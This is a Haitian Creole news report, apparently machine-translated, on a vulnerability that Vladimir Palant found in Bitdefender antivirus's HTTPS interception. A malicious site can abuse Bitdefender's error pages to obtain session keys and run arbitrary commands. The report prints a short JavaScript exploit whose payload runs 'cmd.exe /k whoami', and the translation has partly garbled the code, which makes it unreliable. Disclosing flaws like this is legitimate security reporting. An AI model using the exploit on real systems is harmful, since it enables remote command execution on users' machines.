Vladimir Palant, kreyatè Adblock Plus,
Kòz pwoblèm nan se ke Bitdefender antivirus fè entèsepsyon lokal nan trafik HTTPS lè li ranplase sètifika TLS orijinal la nan sit la. Yon sètifika rasin adisyonèl enstale sou sistèm kliyan an, ki fè li posib kache operasyon an nan sistèm enspeksyon trafik yo itilize. Antivirus la mete tèt li nan trafik pwoteje epi mete pwòp kòd JavaScript li nan kèk paj pou aplike fonksyon Safe Search la, epi nan ka ta gen pwoblèm ak sètifika koneksyon an sekirite, li ranplase paj erè a retounen ak pwòp li yo. Depi nouvo paj erè a sèvi sou non sèvè ke yo te louvri a, lòt paj sou sèvè sa a gen aksè konplè a kontni Bitdefender mete.
Lè w ap ouvri yon sit ki kontwole pa yon atakè, sit sa a ka voye yon XMLHttpRequest epi pretann pwoblèm ak sètifika HTTPS la lè w ap reponn, sa ki pral mennen nan retounen nan yon paj erè twonpe pa Bitdefender. Depi paj erè a louvri nan yon kontèks domèn atakè a, li ka li sa ki nan paj la spoofed ak paramèt Bitdefender. Paj Bitdefender bay la genyen tou yon kle sesyon ki pèmèt ou itilize API Bitdefender entèn la pou lanse yon sesyon navigatè Safepay separe, ki espesifye drapo liy kòmand abitrè yo, epi pou lanse nenpòt kòmandman sistèm lè l sèvi avèk "--utility-cmd-prefix" la. drapo. Yon egzanp yon eksplwatasyon (param1 ak param2 se valè yo jwenn nan paj erè a):
var demann = nouvo XMLHttpRequest ();
request.open("POST", Math.random());
request.setRequestHeader ("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & eko\"");
Ann sonje yon etid ki te fèt an 2017
Se sèlman 11 nan 26 pwodwi yo bay swit chifre aktyèl yo. 5 sistèm pa t verifye sètifika (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security ak pwodwi Total Security te sibi atak
Sous: opennet.ru